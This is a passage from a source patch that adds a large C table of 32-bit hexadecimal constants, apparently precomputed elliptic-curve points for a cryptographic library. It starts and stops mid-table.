UINT32_C(0x40F262AF), UINT32_C(0x4F190537), UINT32_C(0xFB057584) } }, ++ { { UINT32_C(0x08962F6B), UINT32_C(0x487EDC07), UINT32_C(0x190A7E55), ++ UINT32_C(0x6002F1E7), UINT32_C(0x10FDBA0C), UINT32_C(0x7FC62BEA), ++ UINT32_C(0x2C3DBF33), UINT32_C(0xC836BBC5), UINT32_C(0x4F7D2A46), ++ UINT32_C(0x4FDFB5C3), UINT32_C(0xDCA0DF71), UINT32_C(0x824654DE) }, ++ { UINT32_C(0x0C23902B), UINT32_C(0x30A07676), UINT32_C(0x77FBBF37), ++ UINT32_C(0x7F1EBB93), UINT32_C(0xFACC13DB), UINT32_C(0xD307D49D), ++ UINT32_C(0xAE1A261A), UINT32_C(0x148D673A), UINT32_C(0x52D98650), ++ UINT32_C(0xE008F95B), UINT32_C(0x9F558FDE), UINT32_C(0xC7614440) } }, ++ { { UINT32_C(0x9CB16650), UINT32_C(0x17CD6AF6), UINT32_C(0x69F4EEBE), ++ UINT32_C(0x86CC27C1), UINT32_C(0x78822432), UINT32_C(0x7E495B1D), ++ UINT32_C(0x1B974525), UINT32_C(0xFED338E3), UINT32_C(0x86F3CE21), ++ UINT32_C(0x527743D3), UINT32_C(0xB515C896), UINT32_C(0x87948AD3) }, ++ { UINT32_C(0xB17F2FB8), UINT32_C(0x9FDE7039), UINT32_C(0xD9B89D96), ++ UINT32_C(0xA2FA9A5F), UINT32_C(0x36FF74DC), UINT32_C(0x5D46600B), ++ UINT32_C(0x8302C3C9), UINT32_C(0x8EA74B04), UINT32_C(0xF744B5EB), ++ UINT32_C(0xD560F570), UINT32_C(0xFE762402), UINT32_C(0xC921023B) } }, ++ { { UINT32_C(0xFFF4C8ED), UINT32_C(0xA35AB657), UINT32_C(0x8A5FABD7), ++ UINT32_C(0x017C6124), UINT32_C(0x09ACDA28), UINT32_C(0x56463025), ++ UINT32_C(0x14CF238A), UINT32_C(0x6038D361), UINT32_C(0xAF1B9F07), ++ UINT32_C(0x1428B1B6), UINT32_C(0x7482E95C), UINT32_C(0x5827FF44) }, ++ { UINT32_C(0x780FF362), UINT32_C(0xCB997E18), UINT32_C(0xE0BCAC1E), ++ UINT32_C(0x2B89D702), UINT32_C(0xA837DDC8), UINT32_C(0xC632A0B5), ++ UINT32_C(0x59762647), UINT32_C(0xF3EFCF1F), UINT32_C(0x38B0D60A), ++ UINT32_C(0xE9BA309A), UINT32_C(0x20B5FB37), UINT32_C(0x05DEABDD) } }, ++ { { UINT32_C(0xCB8AF047), UINT32_C(0xD44E5DBA), UINT32_C(0x943CFE82), ++ UINT32_C(0x15400CB4), UINT32_C(0x9DF88B67), UINT32_C(0xDBD69575), ++ UINT32_C(0xB2405A7D), UINT32_C(0x8299DB2B), UINT32_C(0x0B1D80CD), ++ UINT32_C(0x46E3BF77), UINT32_C(0xE82BA3D9), UINT32_C(0xC50CF66C) }, ++ { UINT32_C(0xF2F747A9), UINT32_C(0xB2910A07), UINT32_C(0x5ADC89C1), ++ UINT32_C(0xF6B669DB), UINT32_C(0x9052B081), UINT32_C(0x3B5EF1A0), ++ UINT32_C(0xB594ACE2), UINT32_C(0x0F5D5ED3), UINT32_C(0xD5F01320), ++ UINT32_C(0xDA30B8D5), UINT32_C(0xAAFCD58F), UINT32_C(0x0D688C5E) } }, ++ { { UINT32_C(0x2A161074), UINT32_C(0x5EEE3A31), UINT32_C(0xEFE2BE37), ++ UINT32_C(0x6BAAAE56), UINT32_C(0xE3D78698), UINT32_C(0xF9787F61), ++ UINT32_C(0x50630A30), UINT32_C(0xC6836B26), UINT32_C(0x1445DEF1), ++ UINT32_C(0x7445B85D), UINT32_C(0xD568A6A5), UINT32_C(0xD72016A2) }, ++ { UINT32_C(0xE355614F), UINT32_C(0x9DD6F533), UINT32_C(0x91E04588), ++ UINT32_C(0x637E7E5F), UINT32_C(0xB9FB1391), UINT32_C(0x42E142F3), ++ UINT32_C(0x41AFE5DA), UINT32_C(0x0D07C05C), UINT32_C(0x1394EDF1), ++ UINT32_C(0xD7CD25C8), UINT32_C(0xB99288EE), UINT32_C(0xEBE6A0FC) } }, ++ { { UINT32_C(0xBABBAD86), UINT32_C(0xB8E63B7B), UINT32_C(0x90D66766), ++ UINT32_C(0x63226A9F), UINT32_C(0x5CF26666), UINT32_C(0x26381836), ++ UINT32_C(0x4CADD0BF), UINT32_C(0xCCBD142D), UINT32_C(0x9AC29470), ++ UINT32_C(0xA070965E), UINT32_C(0x25FF23ED), UINT32_C(0x6BDCA260) }, ++ { UINT32_C(0x87DCA7B3), UINT32_C(0xD4E00FD4), UINT32_C(0x9E0E8734), ++ UINT32_C(0xA5097833), UINT32_C(0x048173A4), UINT32_C(0xF73F162E), ++ UINT32_C(0x9C3C2FA2), UINT32_C(0xD23F9196), UINT32_C(0xE4AC397A), ++ UINT32_C(0x9AB98B45), UINT32_C(0x543F2D4B), UINT32_C(0x2BAA0300) } }, ++ { { UINT32_C(0xC658C445), UINT32_C(0xBBBE15E7), UINT32_C(0xC28941D1), ++ UINT32_C(0xB8CBCB20), UINT32_C(0x027D6540), UINT32_C(0x65549BE2), ++ UINT32_C(0x1E8EF4F4), UINT32_C(0xEBBCA802), UINT32_C(0xD2ACA397), ++ UINT32_C(0x18214B4B), UINT32_C(0xE31784A3), UINT32_C(0xCBEC7DE2) }, ++ { UINT32_C(0x0116FDF3), UINT32_C(0x96F0533F), UINT32_C(0x5C8F5EE1), ++ UINT32_C(0x68911C90), UINT32_C(0xD568603A), UINT32_C(0x7DE9A3AE), ++ UINT32_C(0x6A3AD7B7), UINT32_C(0x3F56C52C), UINT32_C(0x670B4D0E), ++ UINT32_C(0x5BE9AFCA), UINT32_C(0x375DFE2F), UINT32_C(0x628BFEEE) } }, ++ { { UINT32_C(0xDD4ADDB3), UINT32_C(0x97DAE81B), UINT32_C(0x8704761B), ++ UINT32_C(0x12D2CF4E), UINT32_C(0x3247788D), UINT32_C(0x5E820B40), ++ UINT32_C(0x0051CA80), UINT32_C(0x82234B62), UINT32_C(0x6CB5EA74), ++ UINT32_C(0x0C62704D), UINT32_C(0x23941593), UINT32_C(0xDE560420) }, ++ { UINT32_C(0xF1B04145), UINT32_C(0xB3912A3C), UINT32_C(0xAF93688D), ++ UINT32_C(0xE3967CD7), UINT32_C(0x58DABB4B), UINT32_C(0x2E2DCD2F), ++ UINT32_C(0x0E303911), UINT32_C(0x6564836F), UINT32_C(0xECE07C5C), ++ UINT32_C(0x1F10F19B), UINT32_C(0xD8919126), UINT32_C(0xB47F07EE) } }, ++ { { UINT32_C(0xE9A2EEC9), UINT32_C(0xE3545085), UINT32_C(0x2C8E51FE), ++ UINT32_C(0x81866A97), UINT32_C(0x50027243), UINT32_C(0xD2BA7DB5), ++ UINT32_C(0x4AE87DE4), UINT32_C(0x29DAEAB5), UINT32_C(0x684F9497), ++ UINT32_C(0x5EF3D4B8), UINT32_C(0x9D5D6873), UINT32_C(0xE2DACE3B) }, ++ { UINT32_C(0xFFD29C9C), UINT32_C(0xF012C951), UINT32_C(0xADBADA14), ++ UINT32_C(0x48289445), UINT32_C(0x89558C49), UINT32_C(0x8751F50D), ++ UINT32_C(0x99E35BEE), UINT32_C(0x75511A4F), UINT32_C(0x7D59AA5F), ++ UINT32_C(0xEF802D6E), UINT32_C(0xA2A795E2), UINT32_C(0x14FCAD65) } }, ++ { { UINT32_C(0x08CB8F2C), UINT32_C(0xC8EB00E8), UINT32_C(0x2B45BD86), ++ UINT32_C(0x68607532), UINT32_C(0x59969713), UINT32_C(0x7A29B459), ++ UINT32_C(0xD684201B), UINT32_C(0x5FA15B9B), UINT32_C(0xB9E538EE), ++ UINT32_C(0x1A853190), UINT32_C(0xD573D043), UINT32_C(0x4150605C) }, ++ { UINT32_C(0xEB9FBB68), UINT32_C(0xEF011D3B), UINT32_C(0x66AE32B6), ++ UINT32_C(0x67279982), UINT32_C(0x445DE5EC), UINT32_C(0x861B86EA), ++ UINT32_C(0xA34A50E1), UINT32_C(0x62837D18), UINT32_C(0xBF5F0663), ++ UINT32_C(0x228C006A), UINT32_C(0x396DB36A), UINT32_C(0xE007FDE7) } }, ++ { { UINT32_C(0x5A916A55), UINT32_C(0xDEE4F881), UINT32_C(0xF39C82CB), ++ UINT32_C(0x20DC0370), UINT32_C(0x40F09821), UINT32_C(0xD9A71615), ++ UINT32_C(0xF7273492), UINT32_C(0xD50AD8BF), UINT32_C(0x32E7C4BF), ++ UINT32_C(0xA06F7D12), UINT32_C(0x4C5CEA36), UINT32_C(0xFA0F6154) }, ++ { UINT32_C(0x5FC49CFE), UINT32_C(0xF4FD9BED), UINT32_C(0xC9291678), ++ UINT32_C(0xD8CB45D1), UINT32_C(0x7B92C9F2), UINT32_C(0x94DB86CC), ++ UINT32_C(0x73C81169), UINT32_C(0x09CA5F38), UINT32_C(0xAEED06F0), ++ UINT32_C(0x109F40B0), UINT32_C(0x14DCAA0A), UINT32_C(0x9F0360B2) } }, ++ { { UINT32_C(0xE12AD3E7), UINT32_C(0x4189B70D), UINT32_C(0x10B06607), ++ UINT32_C(0x5208ADB2), UINT32_C(0xEE8497FA), UINT32_C(0xEBD8E2A2), ++ UINT32_C(0xE04F2ECB), UINT32_C(0x61B1BD67), UINT32_C(0x4F3F5F99), ++ UINT32_C(0x0E2DDA72), UINT32_C(0xF747B16D), UINT32_C(0xD5D96740) }, ++ { UINT32_C(0xA6BF397F), UINT32_C(0x308A48F6), UINT32_C(0x23A93595), ++ UINT32_C(0x7021C3E5), UINT32_C(0x36470AA0), UINT32_C(0xF10B0229), ++ UINT32_C(0x4E03295B), UINT32_C(0x7761E8EC), UINT32_C(0x07339770), ++ UINT32_C(0x16EFEF58), UINT32_C(0x5DA5DAA2), UINT32_C(0x0D55D2DD) } }, ++ { { UINT32_C(0x8A22F87A), UINT32_C(0x915EA6A3), UINT32_C(0x2E5A088E), ++ UINT32_C(0x191151C1), UINT32_C(0x7F1D5CBE), UINT32_C(0x190252F1), ++ UINT32_C(0x3B0EC99B), UINT32_C(0xE43F59C3), UINT32_C(0xFF2A6135), ++ UINT32_C(0xBE8588D4), UINT32_C(0x2ECB4B9F), UINT32_C(0x103877CC) }, ++ { UINT32_C(0x023CF92B), UINT32_C(0x8F4147E5), UINT32_C(0x0CC2085B), ++ UINT32_C(0xC24384CC), UINT32_C(0xD082D311), UINT32_C(0x6A2DB4A2), ++ UINT32_C(0xED7BA9AE), UINT32_C(0x06283811), UINT32_C(0x2A8E1592), ++ UINT32_C(0xE9A3F532), UINT32_C(0x5A59E894), UINT32_C(0xAC20F0F4) } }, ++ { { UINT32_C(0x74AAB4B1), UINT32_C(0x788CAA52), UINT32_C(0x2FEAFC7E), ++ UINT32_C(0xEB84ABA1), UINT32_C(0xAC04FF77), UINT32_C(0x31DA71DA), ++ UINT32_C(0x24E4D0BF), UINT32_C(0x39D12EB9), UINT32_C(0x87A34EF8), ++ UINT32_C(0x4F2F292F), UINT32_C(0xA237A8ED), UINT32_C(0x9B324372) }, ++ { UINT32_C(0x2EE3A82D), UINT32_C(0xBB2D04B1), UINT32_C(0xD18D36B2), ++ UINT32_C(0xED4FF367), UINT32_C(0xA6EA0138), UINT32_C(0x99D231EE), ++ UINT32_C(0x4F92E04A), UINT32_C(0x7C2D4F06), UINT32_C(0xCA272FD0), ++ UINT32_C(0x78A82AB2), UINT32_C(0xAB8CDC32), UINT32_C(0x7EC41340) } }, ++ }, ++ { ++ { { UINT32_C(0xD2E15A8C), UINT32_C(0xD23658C8), UINT32_C(0x16BA28CA), ++ UINT32_C(0x23F93DF7), UINT32_C(0x082210F1), UINT32_C(0x6DAB10EC), ++ UINT32_C(0xBFC36490), UINT32_C(0xFB1ADD91), UINT32_C(0x9A4F2D14), ++ UINT32_C(0xEDA8B02F), UINT32_C(0x56560443), UINT32_C(0x9060318C) }, ++ { UINT32_C(0x64711AB2), UINT32_C(0x6C01479E), UINT32_C(0xE337EB85), ++ UINT32_C(0x41446FC7), UINT32_C(0x71888397), UINT32_C(0x4DCF3C1D), ++ UINT32_C(0x13C34FD2), UINT32_C(0x87A9C04E), UINT32_C(0x510C15AC), ++ UINT32_C(0xFE0E08EC), UINT32_C(0xC0F495D2), UINT32_C(0xFC0D0413) } }, ++ { { UINT32_C(0x156636C2), UINT32_C(0xEB05C516), UINT32_C(0x090E93FC), ++ UINT32_C(0x2F613ABA), UINT32_C(0x489576F5), UINT32_C(0xCFD573CD), ++ UINT32_C(0x535A8D57), UINT32_C(0xE6535380), UINT32_C(0x671436C4), ++ UINT32_C(0x13947314), UINT32_C(0x5F0A122D), UINT32_C(0x1172FB0C) }, ++ { UINT32_C(0xC12F58F6), UINT32_C(0xAECC7EC1), UINT32_C(0x8E41AFD2), ++ UINT32_C(0xFE42F957), UINT32_C(0x3D4221AA), UINT32_C(0xDF96F652), ++ UINT32_C(0x2851996B), UINT32_C(0xFEF5649F), UINT32_C(0xD5CFB67E), ++ UINT32_C(0x46FB9F26), UINT32_C(0xEF5C4052), UINT32_C(0xB047BFC7) } }, ++ { { UINT32_C(0xF4484374), UINT32_C(0x5CBDC442), UINT32_C(0xF92452EF), ++ UINT32_C(0x6B156957), UINT32_C(0xC118D02A), UINT32_C(0x58A26886), ++ UINT32_C(0x75AAF276), UINT32_C(0x87FF74E6), UINT32_C(0xF65F6EC1), ++ UINT32_C(0xB133BE95), UINT32_C(0x4B1B8D32), UINT32_C(0xA89B6284) }, ++ { UINT32_C(0x09C81004), UINT32_C(0xDD8A8EF3), UINT32_C(0x0CF21991), ++ UINT32_C(0x7F8225DB), UINT32_C(0x26623FAF), UINT32_C(0xD525A6DB), ++ UINT32_C(0xBAE15453), UINT32_C(0xF2368D40), UINT32_C(0x84F89FC9), ++ UINT32_C(0x55D6A84D), UINT32_C(0x86021A3E), UINT32_C(0xAF38358A) } }, ++ { { UINT32_C(0xFF52E280), UINT32_C(0xBD048BDC), UINT32_C(0x526A1795), ++ UINT32_C(0x8A51D0B2), UINT32_C(0xA985AC0F), UINT32_C(0x40AAA758), ++ UINT32_C(0xF2C7ACE9), UINT32_C(0x6039BCDC), UINT32_C(0x6AEC347D), ++ UINT32_C(0x712092CC), UINT32_C(0x6B5ACAB7), UINT32_C(0x7976D090) }, ++ { UINT32_C(0x6EED9617), UINT32_C(0x1EBCF80D), UINT32_C(0xB0F404A4), ++ UINT32_C(0xB3A63149), UINT32_C(0xD0B610EF), UINT32_C(0x3FDD3D1A), ++ UINT32_C(0x98C28AC7), UINT32_C(0xDD3F6F94), UINT32_C(0x3A59750F), ++ UINT32_C(0x650B7794), UINT32_C(0x2D3991AC), UINT32_C(0xEC59BAB1) } }, ++ { { UINT32_C(0x2E552766), UINT32_C(0x01F40E88), UINT32_C(0x66F5354F), ++ UINT32_C(0x1FE3D509), UINT32_C(0xB3A8EA7F), UINT32_C(0x0E46D006), ++ UINT32_C(0xF831CD6A), UINT32_C(0xF75AB629), UINT32_C(0x91465119), ++ UINT32_C(0xDAD808D7), UINT32_C(0x17EF9B10), UINT32_C(0x442405AF) }, ++ { UINT32_C(0x672BDFCB), UINT32_C(0xD5FE0A96), UINT32_C(0x355DBDEC), ++ UINT32_C(0xA9DFA422), UINT32_C(0x79B25636), UINT32_C(0xFDB79AA1), ++ UINT32_C(0xEECE8AEC), UINT32_C(0xE7F26FFD), UINT32_C(0x7EDD5AA2), ++ UINT32_C(0xB5925550), UINT32_C(0x8EB3A6C2), UINT32_C(0x2C8F6FF0) } }, ++ { { UINT32_C(0x757D6136), UINT32_C(0x88887756), UINT32_C(0x88B92E72), ++ UINT32_C(0xAD9AC183), UINT32_C(0x8785D3EB), UINT32_C(0x92CB2FC4), ++ UINT32_C(0x9319764B), UINT32_C(0xD1A542FE), UINT32_C(0x626A62F8), ++ UINT32_C(0xAF4CC78F), UINT32_C(0x26BFFAAE), UINT32_C(0x7F3F5FC9) }, ++ { UINT32_C(0x40AE2231), UINT32_C(0x0A203D43), UINT32_C(0x387898E8), ++ UINT32_C(0xA8BFD9E0), UINT32_C(0x474B7DDD), UINT32_C(0x1A0C379C), ++ UINT32_C(0x34FD49EA), UINT32_C(0x03855E0A), UINT32_C(0xB3EF4AE1), ++ UINT32_C(0x02B26223), UINT32_C(0xE399E0A3), UINT32_C(0x804BD8CF) } }, ++ { { UINT32_C(0xDE865713), UINT32_C(0x11A9F3D0), UINT32_C(0xBDE98821), ++ UINT32_C(0x81E36B6B), UINT32_C(0x6AA891D0), UINT32_C(0x324996C8), ++ UINT32_C(0x395682B5), UINT32_C(0x7B95BDC1), UINT32_C(0xC1600563), ++ UINT32_C(0x47BF2219), UINT32_C(0x643E38B4), UINT32_C(0x7A473F50) }, ++ { UINT32_C(0xF5738288), UINT32_C(0x0911F50A), UINT32_C(0x6F9C415B), ++ UINT32_C(0xDF947A70), UINT32_C(0x67A067F6), UINT32_C(0xBDB994F2), ++ UINT32_C(0x88BE96CD), UINT32_C(0x3F4BEC1B), UINT32_C(0xE56DD6D9), ++ UINT32_C(0x9820E931), UINT32_C(0x0A80F419), UINT32_C(0xB138F14F) } }, ++ { { UINT32_C(0x0429077A), UINT32_C(0xA11A1A8F), UINT32_C(0x10351C68), ++ UINT32_C(0x2BB1E33D), UINT32_C(0x89459A27), UINT32_C(0x3C25ABFE), ++ UINT32_C(0x6B8AC774), UINT32_C(0x2D0091B8), UINT32_C(0x3B2415D9), ++ UINT32_C(0xDAFC7853), UINT32_C(0x9201680D), UINT32_C(0xDE713CF1) }, ++ { UINT32_C(0x68889D57), UINT32_C(0x8E5F445D), UINT32_C(0x60EABF5B), ++ UINT32_C(0x608B209C), UINT32_C(0xF9CFA408), UINT32_C(0x10EC0ACC), ++ UINT32_C(0x4D1EE754), UINT32_C(0xD5256B9D), UINT32_C(0x0AA6C18D), ++ UINT32_C(0xFF866BAB), UINT32_C(0xACB90A45), UINT32_C(0x9D196DB8) } }, ++ { { UINT32_C(0xB9B081B2), UINT32_C(0xA46D76A9), UINT32_C(0x62163C25), ++ UINT32_C(0xFC743A10), UINT32_C(0x7761C392), UINT32_C(0xCD2A5C8D), ++ UINT32_C(0xBE808583), UINT32_C(0x39BDDE0B), UINT32_C(0xB98E4DFE), ++ UINT32_C(0x7C416021), UINT32_C(0x65913A44), UINT32_C(0xF930E563) }, ++ { UINT32_C(0x7585CF3C), UINT32_C(0xC3555F7E), UINT32_C(0x3D6333D5), ++ UINT32_C(0xC737E383), UINT32_C(0xB430B03D), UINT32_C(0x5B60DBA4), ++ UINT32_C(0xE7555404), UINT32_C(0x42B715EB), UINT32_C(0x7C7796E3), ++ UINT32_C(0x571BDF5B), UINT32_C(0x6DB6331F), UINT32_C(0x33DC62C6) } }, ++ { { UINT32_C(0xE61DEE59), UINT32_C(0x3FB9CCB0), UINT32_C(0x18B14DB9), ++ UINT32_C(0xC5185F23), UINT32_C(0x845EF36C), UINT32_C(0x1B2ADC4F), ++ UINT32_C(0x5C1A33AB), UINT32_C(0x195D5B50), UINT32_C(0x421F59D2), ++ UINT32_C(0x8CEA528E), UINT32_C(0xD2931CEA), UINT32_C(0x7DFCCECF) }, ++ { UINT32_C(0x8CF7E3F7), UINT32_C(0x51FFA1D5), UINT32_C(0xBDC9FB43), ++ UINT32_C(0xF01B7886), UINT32_C(0x261A0D35), UINT32_C(0xD65AB610), ++ UINT32_C(0x7574A554), UINT32_C(0x84BCBAFD), UINT32_C(0xFAD70208), ++ UINT32_C(0x4B119956), UINT32_C(0x4FAB5243), UINT32_C(0xDDC329C2) } }, ++ { { UINT32_C(0x9CE92177), UINT32_C(0x1A08AA57), UINT32_C(0xDC2B5C36), ++ UINT32_C(0x3395E557), UINT32_C(0x394ED04E), UINT32_C(0xFDFE7041), ++ UINT32_C(0xC6DFCDDE), UINT32_C(0xB797EB24), UINT32_C(0xCB9DE5D6), ++ UINT32_C(0x284A6B2A), UINT32_C(0x07222765), UINT32_C(0xE0BD95C8) }, ++ { UINT32_C(0x9FE678A7), UINT32_C(0x114A951B), UINT32_C(0x9E4954EC), ++ UINT32_C(0xE7ECD0BD), UINT32_C(0x79F0B8A9), UINT32_C(0x7D4096FE), ++ UINT32_C(0x09724FE2), UINT32_C(0xBDB26E9A), UINT32_C(0xF787AF95), ++ UINT32_C(0x08741AD8), UINT32_C(0x24045AD8), UINT32_C(0x2BF97272) } }, ++ { { UINT32_C(0xA9451D57), UINT32_C(0xAB1FEDD9), UINT32_C(0x483E38C9), ++ UINT32_C(0xDF4D91DF), UINT32_C(0x24E9CF8E), UINT32_C(0x2D54D311), ++ UINT32_C(0x7A22EEB6), UINT32_C(0x9C2A5AF8), UINT32_C(0x0A43F123), ++ UINT32_C(0xBD9861EF), UINT32_C(0x38A18B7B), UINT32_C(0x581EA6A2) }, ++ { UINT32_C(0x296470A3), UINT32_C(0xAF339C85), UINT32_C(0xAFD8203E), ++ UINT32_C(0xF9603FCD), UINT32_C(0x96763C28), UINT32_C(0x95D05350), ++ UINT32_C(0x860EC831), UINT32_C(0x15445C16), UINT32_C(0x6867A323), ++ UINT32_C(0x2AFB8728), UINT32_C(0x0C4838BF), UINT32_C(0x4B152D6D) } }, ++ { { UINT32_C(0x837CACBA), UINT32_C(0x45BA0E4F), UINT32_C(0xC0725275), ++ UINT32_C(0x7ADB38AE), UINT32_C(0x942D3C28), UINT32_C(0x19C82831), ++ UINT32_C(0x6D0FE7DD), UINT32_C(0x94F4731D), UINT32_C(0x4898F1E6), ++ UINT32_C(0xC3C07E13), UINT32_C(0xED410B51), UINT32_C(0x76350EAC) }, ++ { UINT32_C(0xF99AACFC), UINT32_C(0x0FA8BECA), UINT32_C(0x65FAF9CF), ++ UINT32_C(0x2834D86F), UINT32_C(0x6F3866AF), UINT32_C(0x8E62846A), ++ UINT32_C(0x3DFD6A2B), UINT32_C(0xDAA9BD4F), UINT32_C(0xA6132655), ++ UINT32_C(0xC27115BB), UINT32_C(0xBD5A32C2), UINT32_C(0x83972DF7) } }, ++ { { UINT32_C(0xD513B825), UINT32_C(0xA330CB5B), UINT32_C(0xEE37BEC3), ++ UINT32_C(0xAE18B2D3), UINT32_C(0xF780A902), UINT32_C(0xFC3AB80A), ++ UINT32_C(0xD607DDF1), UINT32_C(0xD7835BE2), UINT32_C(0x5B6E4C2B), ++ UINT32_C(0x8120F767), UINT32_C(0x67E78CCB), UINT32_C(0xAA8C3859) }, ++ { UINT32_C(0xAA0ED321), UINT32_C(0xA8DA8CE2), UINT32_C(0xD766341A), ++ UINT32_C(0xCB8846FD), UINT32_C(0x33DC9D9A), UINT32_C(0xF2A342EE), ++ UINT32_C(0xD0A18A80), UINT32_C(0xA519E0BE), UINT32_C(0xAF48DF4C), ++ UINT32_C(0x9CDAA39C), UINT32_C(0x7E0C19EE), UINT32_C(0xA4B500CA) } }, ++ { { UINT32_C(0x8217001B), UINT32_C(0x83A7FD2F), UINT32_C(0x4296A8BA), ++ UINT32_C(0x4F6FCF06), UINT32_C(0x91619927), UINT32_C(0x7D748643), ++ UINT32_C(0x941E4D41), UINT32_C(0x174C1075), UINT32_C(0xA64F5A6C), ++ UINT32_C(0x037EDEBD), UINT32_C(0x6E29DC56), UINT32_C(0xCF64DB3A) }, ++ { UINT32_C(0x37C0B9F4), UINT32_C(0x150B3ACE), UINT32_C(0x7168178B), ++ UINT32_C(0x1323234A), UINT32_C(0xEF4D1879), UINT32_C(0x1CE47014), ++ UINT32_C(0x17FB4D5C), UINT32_C(0xA22E3742), UINT32_C(0xD985F794), ++ UINT32_C(0x69B81822), UINT32_C(0x081D7214), UINT32_C(0x199C21C4) } }, ++ { { UINT32_C(0x8F04B4D2), UINT32_C(0x160BC7A1), UINT32_C(0xB10DE174), ++ UINT32_C(0x79CA81DD), UINT32_C(0x2DA1E9C7), UINT32_C(0xE2A280B0), ++ UINT32_C(0x1D6A0A29), UINT32_C(0xB4F6BD99), UINT32_C(0x1C5B8F27), ++ UINT32_C(0x57CF3EDD), UINT32_C(0x158C2FD4), UINT32_C(0x7E34FC57) }, ++ { UINT32_C(0xCAC93459), UINT32_C(0x828CFD89), UINT32_C(0xB7AF499F), ++ UINT32_C(0x9E631B6F), UINT32_C(0xDA26C135), UINT32_C(0xF4DC8BC0), ++ UINT32_C(0x37186735), UINT32_C(0x6128ED39), UINT32_C(0x67BF0BA5), ++ UINT32_C(0xBB45538B), UINT32_C(0x0064A3AB), UINT32_C(0x1ADDD4C1) } }, ++ }, ++ { ++ { { UINT32_C(0xDD14D47E), UINT32_C(0xC32730E8), UINT32_C(0xC0F01E0F), ++ UINT32_C(0xCDC1FD42), UINT32_C(0x3F5CD846), UINT32_C(0x2BACFDBF), ++ UINT32_C(0x7272D4DD), UINT32_C(0x45F36416), UINT32_C(0x5EB75776), ++ UINT32_C(0xDD813A79), UINT32_C(0x50997BE2), UINT32_C(0xB57885E4) }, ++ { UINT32_C(0xDB8C9829), UINT32_C(0xDA054E2B), UINT32_C(0xAAB5A594), ++ UINT32_C(0x4161D820), UINT32_C(0x026116A3), UINT32_C(0x4C428F31), ++ UINT32_C(0xDCD85E91), UINT32_C(0x372AF9A0), UINT32_C(0x673ADC2D), ++ UINT32_C(0xFDA6E903), UINT32_C(0xA8DB59E6), UINT32_C(0x4526B8AC) } }, ++ { { UINT32_C(0xE23A8472), UINT32_C(0x68FE359D), UINT32_C(0x4CE3C101), ++ UINT32_C(0x43EB12BD), UINT32_C(0xFC704935), UINT32_C(0x0EC652C3), ++ UINT32_C(0x52E4E22D), UINT32_C(0x1EEFF1F9), UINT32_C(0x083E3ADA), ++ UINT32_C(0xBA6777CB), UINT32_C(0x8BEFC871), UINT32_C(0xAB52D7DC) }, ++ { UINT32_C(0x497CBD59), UINT32_C(0x4EDE689F), UINT32_C(0x27577DD9), ++ UINT32_C(0xC8AE42B9), UINT32_C(0x7AB83C27), UINT32_C(0xE0F08051), ++ UINT32_C(0x2C8C1F48), UINT32_C(0x1F3D5F25), UINT32_C(0xAF241AAC), ++ UINT32_C(0x57991607), UINT32_C(0xB8A337E0), UINT32_C(0xC4458B0A) } }, ++ { { UINT32_C(0x51DD1BA9), UINT32_C(0x3DBB3FA6), UINT32_C(0x545E960B), ++ UINT32_C(0xE53C1C4D), UINT32_C(0x793CE803), UINT32_C(0x35AC6574), ++ UINT32_C(0x83DBCE4F), UINT32_C(0xB2697DC7), UINT32_C(0xE13CF6B0), ++ UINT32_C(0xE35C5BF2), UINT32_C(0xB0C4A164), UINT32_C(0x35034280) }, ++ { UINT32_C(0xD9C0D3C1), UINT32_C(0xAA490908), UINT32_C(0xCB4D2E90), ++ UINT32_C(0x2CCE614D), UINT32_C(0x54D504E4), UINT32_C(0xF646E96C), ++ UINT32_C(0xB73310A3), UINT32_C(0xD74E7541), UINT32_C(0x18BDE5DA), ++ UINT32_C(0xEAD71596), UINT32_C(0xAA09AEF7), UINT32_C(0x96E7F4A8) } }, ++ { { UINT32_C(0x5D6E5F48), UINT32_C(0xA8393A24), UINT32_C(0xF9175CE8), ++ UINT32_C(0x2C8D7EA2), UINT32_C(0x55A20268), UINT32_C(0xD8824E02), ++ UINT32_C(0xA446BCC6), UINT32_C(0x9DD9A272), UINT32_C(0x5351499B), ++ UINT32_C(0xC929CDED), UINT32_C(0xCFE76535), UINT32_C(0xEA5AD9EC) }, ++ { UINT32_C(0xDC32D001), UINT32_C(0x26F3D7D9), UINT32_C(0x43EB9689), ++ UINT32_C(0x51C3BE83), UINT32_C(0x759E6DDB), UINT32_C(0x91FDCC06), ++ UINT32_C(0xE302B891), UINT32_C(0xAC2E1904), UINT32_C(0xC207E1F7), ++ UINT32_C(0xAD25C645), UINT32_C(0xAB3DEB4A), UINT32_C(0x28A70F0D) } }, ++ { { UINT32_C(0x03BEA8F1), UINT32_C(0x922D7F97), UINT32_C(0x584570BE), ++ UINT32_C(0x3AD820D4), UINT32_C(0x3CD46B43), UINT32_C(0x0CE0A850), ++ UINT32_C(0xAE66743D), UINT32_C(0x4C07911F), UINT32_C(0xFDA60023), ++ UINT32_C(0x66519EB9), UINT32_C(0xEC2ACD9C), UINT32_C(0x7F83004B) }, ++ { UINT32_C(0xC3117EAD), UINT32_C(0x001E0B80), UINT32_C(0x0722BA25), ++ UINT32_C(0xBB72D541), UINT32_C(0x6E9A5078), UINT32_C(0x3AF7DB96), ++ UINT32_C(0x701B6B4C), UINT32_C(0x86C5774E), UINT32_C(0x37824DB5), ++ UINT32_C(0xBD2C0E8E), UINT32_C(0xBFAC286D), UINT32_C(0x3AE3028C) } }, ++ { { UINT32_C(0xA33E071B), UINT32_C(0x83D4D4A8), UINT32_C(0x61444BB5), ++ UINT32_C(0x881C0A92), UINT32_C(0x520E3BC3), UINT32_C(0xEEA1E292), ++ UINT32_C(0x2AAAB729), UINT32_C(0x5A5F4C3C), UINT32_C(0xE63C7C94), ++ UINT32_C(0x0B766C5E), UINT32_C(0xBB2CC79C), UINT32_C(0x62BB8A9F) }, ++ { UINT32_C(0xAA5DC49D), UINT32_C(0x97ADC7D2), UINT32_C(0x31718681), ++ UINT32_C(0x30CC26B3), UINT32_C(0x56E86EDE), UINT32_C(0xAC86E6FF), ++ UINT32_C(0xCD52F7F2), UINT32_C(0x37BCA7A2), UINT32_C(0x9CE6D87F), ++ UINT32_C(0x734D2C94), UINT32_C(0xC2F7E0CA), UINT32_C(0x06A71D71) } }, ++ { { UINT32_C(0xC6357D33), UINT32_C(0x559DCF75), UINT32_C(0x652517DE), ++ UINT32_C(0x4616D940), UINT32_C(0x1CCF207B), UINT32_C(0x3D576B98), ++ UINT32_C(0x1979F631), UINT32_C(0x51E2D1EF), UINT32_C(0x06AE8296), ++ UINT32_C(0x57517DDD), UINT32_C(0xD6E7151F), UINT32_C(0x309A3D7F) }, ++ { 